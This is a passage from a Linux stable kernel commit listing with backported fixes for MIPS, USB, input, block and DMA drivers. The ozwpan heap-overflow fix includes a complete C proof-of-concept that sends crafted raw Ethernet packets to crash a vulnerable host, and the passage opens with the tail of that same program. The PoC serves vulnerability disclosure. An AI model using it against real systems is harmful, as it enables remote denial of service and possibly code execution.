      	if (sendto(sockfd, &pwn_packet, sizeof(pwn_packet), 0, (struct sockaddr *)&socket_address, sizeof(socket_address)) < 0) {
      		perror("sendto");
      		return 1;
      	}
      	return 0;
      }
      Signed-off-by: default avatarJason A. Donenfeld <Jason@zx2c4.com>
      Acked-by: default avatarDan Carpenter <dan.carpenter@oracle.com>
      Signed-off-by: default avatarGreg Kroah-Hartman <gregkh@linuxfoundation.org>
      d1933bf4
    • Jason A. Donenfeld's avatar
      ozwpan: Use proper check to prevent heap overflow · 97c424c4
      Jason A. Donenfeld authored
      commit d114b9fe upstream.
      
      Since elt->length is a u8, we can make this variable a u8. Then we can
      do proper bounds checking more easily. Without this, a potentially
      negative value is passed to the memcpy inside oz_hcd_get_desc_cnf,
      resulting in a remotely exploitable heap overflow with network
      supplied data.
      
      This could result in remote code execution. A PoC which obtains DoS
      follows below. It requires the ozprotocol.h file from this module.
      
      =-=-=-=-=-=
      
       #include <arpa/inet.h>
       #include <linux/if_packet.h>
       #include <net/if.h>
       #include <netinet/ether.h>
       #include <stdio.h>
       #include <string.h>
       #include <stdlib.h>
       #include <endian.h>
       #include <sys/ioctl.h>
       #include <sys/socket.h>
      
       #define u8 uint8_t
       #define u16 uint16_t
       #define u32 uint32_t
       #define __packed __attribute__((__packed__))
       #include "ozprotocol.h"
      
      static int hex2num(char c)
      {
      	if (c >= '0' && c <= '9')
      		return c - '0';
      	if (c >= 'a' && c <= 'f')
      		return c - 'a' + 10;
      	if (c >= 'A' && c <= 'F')
      		return c - 'A' + 10;
      	return -1;
      }
      static int hwaddr_aton(const char *txt, uint8_t *addr)
      {
      	int i;
      	for (i = 0; i < 6; i++) {
      		int a, b;
      		a = hex2num(*txt++);
      		if (a < 0)
      			return -1;
      		b = hex2num(*txt++);
      		if (b < 0)
      			return -1;
      		*addr++ = (a << 4) | b;
      		if (i < 5 && *txt++ != ':')
      			return -1;
      	}
      	return 0;
      }
      
      int main(int argc, char *argv[])
      {
      	if (argc < 3) {
      		fprintf(stderr, "Usage: %s interface destination_mac\n", argv[0]);
      		return 1;
      	}
      
      	uint8_t dest_mac[6];
      	if (hwaddr_aton(argv[2], dest_mac)) {
      		fprintf(stderr, "Invalid mac address.\n");
      		return 1;
      	}
      
      	int sockfd = socket(AF_PACKET, SOCK_RAW, IPPROTO_RAW);
      	if (sockfd < 0) {
      		perror("socket");
      		return 1;
      	}
      
      	struct ifreq if_idx;
      	int interface_index;
      	strncpy(if_idx.ifr_ifrn.ifrn_name, argv[1], IFNAMSIZ - 1);
      	if (ioctl(sockfd, SIOCGIFINDEX, &if_idx) < 0) {
      		perror("SIOCGIFINDEX");
      		return 1;
      	}
      	interface_index = if_idx.ifr_ifindex;
      	if (ioctl(sockfd, SIOCGIFHWADDR, &if_idx) < 0) {
      		perror("SIOCGIFHWADDR");
      		return 1;
      	}
      	uint8_t *src_mac = (uint8_t *)&if_idx.ifr_hwaddr.sa_data;
      
      	struct {
      		struct ether_header ether_header;
      		struct oz_hdr oz_hdr;
      		struct oz_elt oz_elt;
      		struct oz_elt_connect_req oz_elt_connect_req;
      	} __packed connect_packet = {
      		.ether_header = {
      			.ether_type = htons(OZ_ETHERTYPE),
      			.ether_shost = { src_mac[0], src_mac[1], src_mac[2], src_mac[3], src_mac[4], src_mac[5] },
      			.ether_dhost = { dest_mac[0], dest_mac[1], dest_mac[2], dest_mac[3], dest_mac[4], dest_mac[5] }
      		},
      		.oz_hdr = {
      			.control = OZ_F_ACK_REQUESTED | (OZ_PROTOCOL_VERSION << OZ_VERSION_SHIFT),
      			.last_pkt_num = 0,
      			.pkt_num = htole32(0)
      		},
      		.oz_elt = {
      			.type = OZ_ELT_CONNECT_REQ,
      			.length = sizeof(struct oz_elt_connect_req)
      		},
      		.oz_elt_connect_req = {
      			.mode = 0,
      			.resv1 = {0},
      			.pd_info = 0,
      			.session_id = 0,
      			.presleep = 35,
      			.ms_isoc_latency = 0,
      			.host_vendor = 0,
      			.keep_alive = 0,
      			.apps = htole16((1 << OZ_APPID_USB) | 0x1),
      			.max_len_div16 = 0,
      			.ms_per_isoc = 0,
      			.up_audio_buf = 0,
      			.ms_per_elt = 0
      		}
      	};
      
      	struct {
      		struct ether_header ether_header;
      		struct oz_hdr oz_hdr;
      		struct oz_elt oz_elt;
      		struct oz_get_desc_rsp oz_get_desc_rsp;
      	} __packed pwn_packet = {
      		.ether_header = {
      			.ether_type = htons(OZ_ETHERTYPE),
      			.ether_shost = { src_mac[0], src_mac[1], src_mac[2], src_mac[3], src_mac[4], src_mac[5] },
      			.ether_dhost = { dest_mac[0], dest_mac[1], dest_mac[2], dest_mac[3], dest_mac[4], dest_mac[5] }
      		},
      		.oz_hdr = {
      			.control = OZ_F_ACK_REQUESTED | (OZ_PROTOCOL_VERSION << OZ_VERSION_SHIFT),
      			.last_pkt_num = 0,
      			.pkt_num = htole32(1)
      		},
      		.oz_elt = {
      			.type = OZ_ELT_APP_DATA,
      			.length = sizeof(struct oz_get_desc_rsp) - 2
      		},
      		.oz_get_desc_rsp = {
      			.app_id = OZ_APPID_USB,
      			.elt_seq_num = 0,
      			.type = OZ_GET_DESC_RSP,
      			.req_id = 0,
      			.offset = htole16(0),
      			.total_size = htole16(0),
      			.rcode = 0,
      			.data = {0}
      		}
      	};
      
      	struct sockaddr_ll socket_address = {
      		.sll_ifindex = interface_index,
      		.sll_halen = ETH_ALEN,
      		.sll_addr = { dest_mac[0], dest_mac[1], dest_mac[2], dest_mac[3], dest_mac[4], dest_mac[5] }
      	};
      
      	if (sendto(sockfd, &connect_packet, sizeof(connect_packet), 0, (struct sockaddr *)&socket_address, sizeof(socket_address)) < 0) {
      		perror("sendto");
      		return 1;
      	}
      	usleep(300000);
      	if (sendto(sockfd, &pwn_packet, sizeof(pwn_packet), 0, (struct sockaddr *)&socket_address, sizeof(socket_address)) < 0) {
      		perror("sendto");
      		return 1;
      	}
      	return 0;
      }
      Signed-off-by: default avatarJason A. Donenfeld <Jason@zx2c4.com>
      Acked-by: default avatarDan Carpenter <dan.carpenter@oracle.com>
      Signed-off-by: default avatarGreg Kroah-Hartman <gregkh@linuxfoundation.org>
      97c424c4
    • Nicholas Mc Guire's avatar
      MIPS: KVM: Do not sign extend on unsigned MMIO load · fab0713b
      Nicholas Mc Guire authored
      commit ed9244e6 upstream.
      
      Fix possible unintended sign extension in unsigned MMIO loads by casting
      to uint16_t in the case of mmio_needed != 2.
      Signed-off-by: default avatarNicholas Mc Guire <hofrat@osadl.org>
      Reviewed-by: default avatarJames Hogan <james.hogan@imgtec.com>
      Tested-by: default avatarJames Hogan <james.hogan@imgtec.com>
      Cc: Gleb Natapov <gleb@kernel.org>
      Cc: Paolo Bonzini <pbonzini@redhat.com>
      Cc: kvm@vger.kernel.org
      Cc: linux-mips@linux-mips.org
      Cc: linux-kernel@vger.kernel.org
      Patchwork: https://patchwork.linux-mips.org/patch/9985/Signed-off-by: default avatarRalf Baechle <ralf@linux-mips.org>
      Signed-off-by: default avatarGreg Kroah-Hartman <gregkh@linuxfoundation.org>
      fab0713b
    • James Hogan's avatar
      MIPS: Fix enabling of DEBUG_STACKOVERFLOW · f0420c7b
      James Hogan authored
      commit 5f35b9cd upstream.
      
      Commit 334c86c4 ("MIPS: IRQ: Add stackoverflow detection") added
      kernel stack overflow detection, however it only enabled it conditional
      upon the preprocessor definition DEBUG_STACKOVERFLOW, which is never
      actually defined. The Kconfig option is called DEBUG_STACKOVERFLOW,
      which manifests to the preprocessor as CONFIG_DEBUG_STACKOVERFLOW, so
      switch it to using that definition instead.
      
      Fixes: 334c86c4 ("MIPS: IRQ: Add stackoverflow detection")
      Signed-off-by: default avatarJames Hogan <james.hogan@imgtec.com>
      Cc: Ralf Baechle <ralf@linux-mips.org>
      Cc: Adam Jiang <jiang.adam@gmail.com>
      Cc: linux-mips@linux-mips.org
      Patchwork: http://patchwork.linux-mips.org/patch/10531/Signed-off-by: default avatarRalf Baechle <ralf@linux-mips.org>
      Signed-off-by: default avatarGreg Kroah-Hartman <gregkh@linuxfoundation.org>
      f0420c7b
    • Jonas Gorski's avatar
      MIPS: ralink: Fix clearing the illegal access interrupt · a7b6c6e2
      Jonas Gorski authored
      commit 9dd6f1c1 upstream.
      
      Due to a typo the illegal access interrupt is never cleared in by
      the interupt handler, causing an effective deadlock on the first
      illegal access.
      
      This was broken since the code was introduced in 5433acd8 ("MIPS:
      ralink: add illegal access driver"), but only exposed when the Kconfig
      symbol was added, thus enabling the code.
      
      Fixes: a7b7aad3 ("MIPS: ralink: add missing symbol for RALINK_ILL_ACC")
      Signed-off-by: default avatarJonas Gorski <jogo@openwrt.org>
      Cc: linux-mips@linux-mips.org
      Cc: John Crispin <blogic@openwrt.org>
      Patchwork: https://patchwork.linux-mips.org/patch/10172/Signed-off-by: default avatarRalf Baechle <ralf@linux-mips.org>
      Signed-off-by: default avatarGreg Kroah-Hartman <gregkh@linuxfoundation.org>
      a7b6c6e2
    • Wang Long's avatar
      ring-buffer-benchmark: Fix the wrong sched_priority of producer · 80817911
      Wang Long authored
      commit 10802932 upstream.
      
      The producer should be used producer_fifo as its sched_priority,
      so correct it.
      
      Link: http://lkml.kernel.org/r/1433923957-67842-1-git-send-email-long.wanglong@huawei.comSigned-off-by: default avatarWang Long <long.wanglong@huawei.com>
      Signed-off-by: default avatarSteven Rostedt <rostedt@goodmis.org>
      Signed-off-by: default avatarGreg Kroah-Hartman <gregkh@linuxfoundation.org>
      80817911
    • Andy Lutomirski's avatar
      x86/asm/irq: Stop relying on magic JMP behavior for early_idt_handlers · 99124e4d
      Andy Lutomirski authored
      commit 425be567 upstream.
      
      The early_idt_handlers asm code generates an array of entry
      points spaced nine bytes apart.  It's not really clear from that
      code or from the places that reference it what's going on, and
      the code only works in the first place because GAS never
      generates two-byte JMP instructions when jumping to global
      labels.
      
      Clean up the code to generate the correct array stride (member size)
      explicitly. This should be considerably more robust against
      screw-ups, as GAS will warn if a .fill directive has a negative
      count.  Using '. =' to advance would have been even more robust
      (it would generate an actual error if it tried to move
      backwards), but it would pad with nulls, confusing anyone who
      tries to disassemble the code.  The new scheme should be much
      clearer to future readers.
      
      While we're at it, improve the comments and rename the array and
      common code.
      
      Binutils may start relaxing jumps to non-weak labels.  If so,
      this change will fix our build, and we may need to backport this
      change.
      
      Before, on x86_64:
      
        0000000000000000 <early_idt_handlers>:
           0:   6a 00                   pushq  $0x0
           2:   6a 00                   pushq  $0x0
           4:   e9 00 00 00 00          jmpq   9 <early_idt_handlers+0x9>
                                5: R_X86_64_PC32        early_idt_handler-0x4
        ...
          48:   66 90                   xchg   %ax,%ax
          4a:   6a 08                   pushq  $0x8
          4c:   e9 00 00 00 00          jmpq   51 <early_idt_handlers+0x51>
                                4d: R_X86_64_PC32       early_idt_handler-0x4
        ...
         117:   6a 00                   pushq  $0x0
         119:   6a 1f                   pushq  $0x1f
         11b:   e9 00 00 00 00          jmpq   120 <early_idt_handler>
                                11c: R_X86_64_PC32      early_idt_handler-0x4
      
      After:
      
        0000000000000000 <early_idt_handler_array>:
           0:   6a 00                   pushq  $0x0
           2:   6a 00                   pushq  $0x0
           4:   e9 14 01 00 00          jmpq   11d <early_idt_handler_common>
        ...
          48:   6a 08                   pushq  $0x8
          4a:   e9 d1 00 00 00          jmpq   120 <early_idt_handler_common>
          4f:   cc                      int3
          50:   cc                      int3
        ...
         117:   6a 00                   pushq  $0x0
         119:   6a 1f                   pushq  $0x1f
         11b:   eb 03                   jmp    120 <early_idt_handler_common>
         11d:   cc                      int3
         11e:   cc                      int3
         11f:   cc                      int3
      Signed-off-by: default avatarAndy Lutomirski <luto@kernel.org>
      Acked-by: default avatarH. Peter Anvin <hpa@linux.intel.com>
      Cc: Binutils <binutils@sourceware.org>
      Cc: Borislav Petkov <bp@alien8.de>
      Cc: H.J. Lu <hjl.tools@gmail.com>
      Cc: Jan Beulich <JBeulich@suse.com>
      Cc: Linus Torvalds <torvalds@linux-foundation.org>
      Cc: Peter Zijlstra <peterz@infradead.org>
      Cc: Thomas Gleixner <tglx@linutronix.de>
      Link: http://lkml.kernel.org/r/ac027962af343b0c599cbfcf50b945ad2ef3d7a8.1432336324.git.luto@kernel.orgSigned-off-by: default avatarIngo Molnar <mingo@kernel.org>
      Signed-off-by: default avatarGreg Kroah-Hartman <gregkh@linuxfoundation.org>
      99124e4d
    • Arthur Demchenkov's avatar
      usb: make module xhci_hcd removable · f563b2e3
      Arthur Demchenkov authored
      commit b04c846c upstream.
      
      Fixed regression. After commit 29e409f0 ("xhci: Allow xHCI drivers to
      be built as separate modules") the module xhci_hcd became non-removable.
      That behaviour is not expected and there're no notes about it in commit
      message. The module should be removable as it blocks PM suspend/resume
      functions (Debian Bug#666406).
      Signed-off-by: default avatarArthur Demchenkov <spinal.by@gmail.com>
      Reviewed-by: default avatarAndrew Bresticker <abrestic@chromium.org>
      Signed-off-by: default avatarMathias Nyman <mathias.nyman@linux.intel.com>
      Signed-off-by: default avatarGreg Kroah-Hartman <gregkh@linuxfoundation.org>
      f563b2e3
    • Chris Bainbridge's avatar
      usb: host: xhci: add mutex for non-thread-safe data · 67caef93
      Chris Bainbridge authored
      commit a00918d0 upstream.
      
      Regression in commit 638139eb ("usb: hub: allow to process more usb
      hub events in parallel")
      
      The regression resulted in intermittent failure to initialise a 10-port
      hub (with three internal VL812 4-port hub controllers) on boot, with a
      failure rate of around 8%, due to multiple race conditions when
      accessing addr_dev and slot_id in struct xhci_hcd.
      
      This regression also exposed a problem with xhci_setup_device, which
      "should be protected by the usb_address0_mutex" but no longer is due to
      
      commit 6fecd4f2 ("USB: separate usb_address0 mutexes for each bus")
      
      With separate buses (and locks) it is no longer the case that a single
      lock will protect xhci_setup_device from accesses by two parallel
      threads processing events on the two buses.
      
      Fix this by adding a mutex to protect addr_dev and slot_id in struct
      xhci_hcd, and by making the assignment of slot_id atomic.
      
      Fixes multiple boot errors:
      
      [ 0.583008] xhci_hcd 0000:00:14.0: Bad Slot ID 2
      [ 0.583009] xhci_hcd 0000:00:14.0: Could not allocate xHCI USB device data structures
      [ 0.583012] usb usb1-port3: couldn't allocate usb_device
      
      And:
      
      [ 0.637409] xhci_hcd 0000:00:14.0: Error while assigning device slot ID
      [ 0.637417] xhci_hcd 0000:00:14.0: Max number of devices this xHCI host supports is 32.
      [ 0.637421] usb usb1-port1: couldn't allocate usb_device
      
      And:
      
      [ 0.753372] xhci_hcd 0000:00:14.0: ERROR: unexpected setup context command completion code 0x0.
      [ 0.753373] usb 1-3: hub failed to enable device, error -22
      [ 0.753400] xhci_hcd 0000:00:14.0: Error while assigning device slot ID
      [ 0.753402] xhci_hcd 0000:00:14.0: Max number of devices this xHCI host supports is 32.
      [ 0.753403] usb usb1-port3: couldn't allocate usb_device
      
      And:
      
      [ 11.018386] usb 1-3: device descriptor read/all, error -110
      
      And:
      
      [ 5.753838] xhci_hcd 0000:00:14.0: Timeout while waiting for setup device command
      
      Tested with 200 reboots, resulting in no USB hub init related errors.
      
      Fixes: 638139eb ("usb: hub: allow to process more usb hub events in parallel")
      Link: https://lkml.kernel.org/g/CAP-bSRb=A0iEYobdGCLpwynS7pkxpt_9ZnwyZTPVAoy0Y=Zo3Q@mail.gmail.comSigned-off-by: default avatarChris Bainbridge <chris.bainbridge@gmail.com>
      [changed git commit description style for checkpatch -Mathias]
      Signed-off-by: default avatarMathias Nyman <mathias.nyman@linux.intel.com>
      Signed-off-by: default avatarGreg Kroah-Hartman <gregkh@linuxfoundation.org>
      67caef93
    • Subbaraya Sundeep Bhatta's avatar
      usb: dwc3: gadget: Fix incorrect DEPCMD and DGCMD status macros · 8db77c8e
      Subbaraya Sundeep Bhatta authored
      commit 459e210c upstream.
      
      Fixed the incorrect macro definitions correctly as per databook.
      Signed-off-by: default avatarSubbaraya Sundeep Bhatta <sbhatta@xilinx.com>
      Fixes: b09bb642 (usb: dwc3: gadget: implement Global Command support)
      Signed-off-by: default avatarFelipe Balbi <balbi@ti.com>
      Signed-off-by: default avatarGreg Kroah-Hartman <gregkh@linuxfoundation.org>
      8db77c8e
    • Patrick Riphagen's avatar
      USB: serial: ftdi_sio: Add support for a Motion Tracker Development Board · 2fbf7290
      Patrick Riphagen authored
      commit 1df5b888 upstream.
      
      This adds support for new Xsens device, Motion Tracker Development Board,
      using Xsens' own Vendor ID
      Signed-off-by: default avatarPatrick Riphagen <patrick.riphagen@xsens.com>
      Signed-off-by: default avatarJohan Hovold <johan@kernel.org>
      Signed-off-by: default avatarGreg Kroah-Hartman <gregkh@linuxfoundation.org>
      2fbf7290
    • John D. Blair's avatar
      USB: cp210x: add ID for HubZ dual ZigBee and Z-Wave dongle · 6bb1f9c8
      John D. Blair authored
      commit df72d588 upstream.
      
      Added the USB serial device ID for the HubZ dual ZigBee
      and Z-Wave radio dongle.
      Signed-off-by: default avatarJohn D. Blair <johnb@candicontrols.com>
      Signed-off-by: default avatarJohan Hovold <johan@kernel.org>
      Signed-off-by: default avatarGreg Kroah-Hartman <gregkh@linuxfoundation.org>
      6bb1f9c8
    • NeilBrown's avatar
      block: discard bdi_unregister() in favour of bdi_destroy() · 9e58b828
      NeilBrown authored
      commit aad653a0 upstream.
      
      bdi_unregister() now contains very little functionality.
      
      It contains a "WARN_ON" if bdi->dev is NULL.  This warning is of no
      real consequence as bdi->dev isn't needed by anything else in the function,
      and it triggers if
         blk_cleanup_queue() -> bdi_destroy()
      is called before bdi_unregister, which happens since
        Commit: 6cd18e71 ("block: destroy bdi before blockdev is unregistered.")
      
      So this isn't wanted.
      
      It also calls bdi_set_min_ratio().  This needs to be called after
      writes through the bdi have all been flushed, and before the bdi is destroyed.
      Calling it early is better than calling it late as it frees up a global
      resource.
      
      Calling it immediately after bdi_wb_shutdown() in bdi_destroy()
      perfectly fits these requirements.
      
      So bdi_unregister() can be discarded with the important content moved to
      bdi_destroy(), as can the
        writeback_bdi_unregister
      event which is already not used.
      Reported-by: default avatarMike Snitzer <snitzer@redhat.com>
      Fixes: c4db59d3 ("fs: don't reassign dirty inodes to default_backing_dev_info")
      Fixes: 6cd18e71 ("block: destroy bdi before blockdev is unregistered.")
      Acked-by: default avatarPeter Zijlstra (Intel) <peterz@infradead.org>
      Acked-by: default avatarDan Williams <dan.j.williams@intel.com>
      Tested-by: default avatarNicholas Moulin <nicholas.w.moulin@linux.intel.com>
      Signed-off-by: default avatarNeilBrown <neilb@suse.de>
      Reviewed-by: default avatarChristoph Hellwig <hch@lst.de>
      Signed-off-by: default avatarJens Axboe <axboe@fb.com>
      Signed-off-by: default avatarGreg Kroah-Hartman <gregkh@linuxfoundation.org>
      9e58b828
    • Dan Williams's avatar
      block: fix ext_dev_lock lockdep report · 4fc9b9d8
      Dan Williams authored
      commit 4d66e5e9 upstream.
      
       =================================
       [ INFO: inconsistent lock state ]
       4.1.0-rc7+ #217 Tainted: G           O
       ---------------------------------
       inconsistent {SOFTIRQ-ON-W} -> {IN-SOFTIRQ-W} usage.
       swapper/6/0 [HC0[0]:SC1[1]:HE1:SE0] takes:
        (ext_devt_lock){+.?...}, at: [<ffffffff8143a60c>] blk_free_devt+0x3c/0x70
       {SOFTIRQ-ON-W} state was registered at:
         [<ffffffff810bf6b1>] __lock_acquire+0x461/0x1e70
         [<ffffffff810c1947>] lock_acquire+0xb7/0x290
         [<ffffffff818ac3a8>] _raw_spin_lock+0x38/0x50
         [<ffffffff8143a07d>] blk_alloc_devt+0x6d/0xd0  <-- take the lock in process context
      [..]
        [<ffffffff810bf64e>] __lock_acquire+0x3fe/0x1e70
        [<ffffffff810c00ad>] ? __lock_acquire+0xe5d/0x1e70
        [<ffffffff810c1947>] lock_acquire+0xb7/0x290
        [<ffffffff8143a60c>] ? blk_free_devt+0x3c/0x70
        [<ffffffff818ac3a8>] _raw_spin_lock+0x38/0x50
        [<ffffffff8143a60c>] ? blk_free_devt+0x3c/0x70
        [<ffffffff8143a60c>] blk_free_devt+0x3c/0x70    <-- take the lock in softirq
        [<ffffffff8143bfec>] part_release+0x1c/0x50
        [<ffffffff8158edf6>] device_release+0x36/0xb0
        [<ffffffff8145ac2b>] kobject_cleanup+0x7b/0x1a0
        [<ffffffff8145aad0>] kobject_put+0x30/0x70
        [<ffffffff8158f147>] put_device+0x17/0x20
        [<ffffffff8143c29c>] delete_partition_rcu_cb+0x16c/0x180
        [<ffffffff8143c130>] ? read_dev_sector+0xa0/0xa0
        [<ffffffff810e0e0f>] rcu_process_callbacks+0x2ff/0xa90
        [<ffffffff810e0dcf>] ? rcu_process_callbacks+0x2bf/0xa90
        [<ffffffff81067e2e>] __do_softirq+0xde/0x600
      
      Neil sees this in his tests and it also triggers on pmem driver unbind
      for the libnvdimm tests.  This fix is on top of an initial fix by Keith
      for incorrect usage of mutex_lock() in this path: 2da78092 "block:
      Fix dev_t minor allocation lifetime".  Both this and 2da78092 are
      candidates for -stable.
      
      Fixes: 2da78092 ("block: Fix dev_t minor allocation lifetime")
      Cc: Keith Busch <keith.busch@intel.com>
      Reported-by: default avatarNeilBrown <neilb@suse.de>
      Signed-off-by: default avatarDan Williams <dan.j.williams@intel.com>
      Signed-off-by: default avatarJens Axboe <axboe@fb.com>
      Signed-off-by: default avatarGreg Kroah-Hartman <gregkh@linuxfoundation.org>
      4fc9b9d8
    • Sam Hung's avatar
      Input: elantech - add new icbody type · 287a036d
      Sam Hung authored
      commit 692dd191 upstream.
      
      This adds new icbody type to the list recognized by Elantech PS/2 driver.
      Signed-off-by: default avatarSam Hung <sam.hung@emc.com.tw>
      Signed-off-by: default avatarDmitry Torokhov <dmitry.torokhov@gmail.com>
      Signed-off-by: default avatarGreg Kroah-Hartman <gregkh@linuxfoundation.org>
      287a036d
    • Hans de Goede's avatar
      Input: elantech - fix detection of touchpads where the revision matches a known rate · b71dac0d
      Hans de Goede authored
      commit 5f0ee9d1 upstream.
      
      Make the check to skip the rate check more lax, so that it applies
      to all hw_version 4 models.
      
      This fixes the touchpad not being detected properly on Asus PU551LA
      laptops.
      Reported-and-tested-by: default avatarDavid Zafra Gómez <dezeta@klo.es>
      Signed-off-by: default avatarHans de Goede <hdegoede@redhat.com>
      Signed-off-by: default avatarDmitry Torokhov <dmitry.torokhov@gmail.com>
      Signed-off-by: default avatarGreg Kroah-Hartman <gregkh@linuxfoundation.org>
      b71dac0d
    • Peter Hutterer's avatar
    • Hans de Goede's avatar
      Input: alps - do not reduce trackpoint speed by half · ab6c8907
      Hans de Goede authored
      commit 088df2cc upstream.
      
      On some v7 devices (e.g. Lenovo-E550) the deltas reported are typically
      only in the 0-1 range dividing this by 2 results in a range of 0-0.
      
      And even for v7 devices where this does not lead to making the trackstick
      entirely unusable, it makes it twice as slow as before we added v7 support
      and were using the ps/2 mouse emulation of the dual point setup.
      
      If some kind of generic slowdown is actually necessary for some devices,
      then that belongs in userspace, not in the kernel.
      Reported-and-tested-by: default avatarRico Moorman <rico.moorman@gmail.com>
      Signed-off-by: default avatarHans de Goede <hdegoede@redhat.com>
      Reviewed-by: default avatarBenjamin Tissoires <benjamin.tissoires@gmail.com>
      Signed-off-by: default avatarDmitry Torokhov <dmitry.torokhov@gmail.com>
      Signed-off-by: default avatarGreg Kroah-Hartman <gregkh@linuxfoundation.org>
      ab6c8907
    • Vasily Khoruzhick's avatar
      i2c: s3c2410: fix oops in suspend callback for non-dt platforms · db4b678b
      Vasily Khoruzhick authored
      commit 8d487a43 upstream.
      
      Initialize sysreg by default, otherwise driver will crash in suspend
      callback when not using DT.
      Signed-off-by: default avatarVasily Khoruzhick <anarsoul@gmail.com>
      Reviewed-by: default avatarKrzysztof Kozlowski <k.kozlowski@samsung.com>
      Signed-off-by: default avatarWolfram Sang <wsa@the-dreams.de>
      Fixes: a7750c3e ("i2c: s3c2410: Handle i2c sys_cfg register in i2c driver")
      Signed-off-by: default avatarGreg Kroah-Hartman <gregkh@linuxfoundation.org>
      db4b678b
    • Axel Lin's avatar
      i2c: hix5hd2: Fix modalias to make module auto-loading work · c5133e0d
      Axel Lin authored
      commit 3e59ae4a upstream.
      
      Make the modalias match driver name, this is required to make module
      auto-loading work.
      Signed-off-by: default avatarAxel Lin <axel.lin@ingics.com>
      Acked-by: default avatarZhangfei Gao <zhangfei.gao@linaro.org>
      Signed-off-by: default avatarWolfram Sang <wsa@the-dreams.de>
      Signed-off-by: default avatarGreg Kroah-Hartman <gregkh@linuxfoundation.org>
      c5133e0d
    • Ludovic Desroches's avatar
      dmaengine: at_xdmac: lock fixes · a5ae9b56
      Ludovic Desroches authored
      commit 4c374fc7 upstream.
      
      Using _bh variant for spin locks causes this kind of warning:
      Starting logging: ------------[ cut here ]------------
      WARNING: CPU: 0 PID: 3 at /ssd_drive/linux/kernel/softirq.c:151
      __local_bh_enable_ip+0xe8/0xf4()
      Modules linked in:
      CPU: 0 PID: 3 Comm: ksoftirqd/0 Not tainted 4.1.0-rc2+ #94
      Hardware name: Atmel SAMA5
      [<c0013c04>] (unwind_backtrace) from [<c00118a4>] (show_stack+0x10/0x14)
      [<c00118a4>] (show_stack) from [<c001bbcc>]
      (warn_slowpath_common+0x80/0xac)
      [<c001bbcc>] (warn_slowpath_common) from [<c001bc14>]
      (warn_slowpath_null+0x1c/0x24)
      [<c001bc14>] (warn_slowpath_null) from [<c001e28c>]
      (__local_bh_enable_ip+0xe8/0xf4)
      [<c001e28c>] (__local_bh_enable_ip) from [<c01fdbd0>]
      (at_xdmac_device_terminate_all+0xf4/0x100)
      [<c01fdbd0>] (at_xdmac_device_terminate_all) from [<c02221a4>]
      (atmel_complete_tx_dma+0x34/0xf4)
      [<c02221a4>] (atmel_complete_tx_dma) from [<c01fe4ac>]
      (at_xdmac_tasklet+0x14c/0x1ac)
      [<c01fe4ac>] (at_xdmac_tasklet) from [<c001de58>]
      (tasklet_action+0x68/0xb4)
      [<c001de58>] (tasklet_action) from [<c001dfdc>]
      (__do_softirq+0xfc/0x238)
      [<c001dfdc>] (__do_softirq) from [<c001e140>] (run_ksoftirqd+0x28/0x34)
      [<c001e140>] (run_ksoftirqd) from [<c0033a3c>]
      (smpboot_thread_fn+0x138/0x18c)
      [<c0033a3c>] (smpboot_thread_fn) from [<c0030e7c>] (kthread+0xdc/0xf0)
      [<c0030e7c>] (kthread) from [<c000f480>] (ret_from_fork+0x14/0x34)
      ---[ end trace b57b14a99c1d8812 ]---
      
      It comes from the fact that devices can called some code from the DMA
      controller with irq disabled. _bh variant is not intended to be used in
      this case since it can enable irqs. Switch to irqsave/irqrestore variant to
      avoid this situation.
      Signed-off-by: default avatarLudovic Desroches <ludovic.desroches@atmel.com>
      Signed-off-by: default avatarVinod Koul <vinod.koul@intel.com>
      Signed-off-by: default avatarGreg Kroah-Hartman <gregkh@linuxfoundation.org>
      a5ae9b56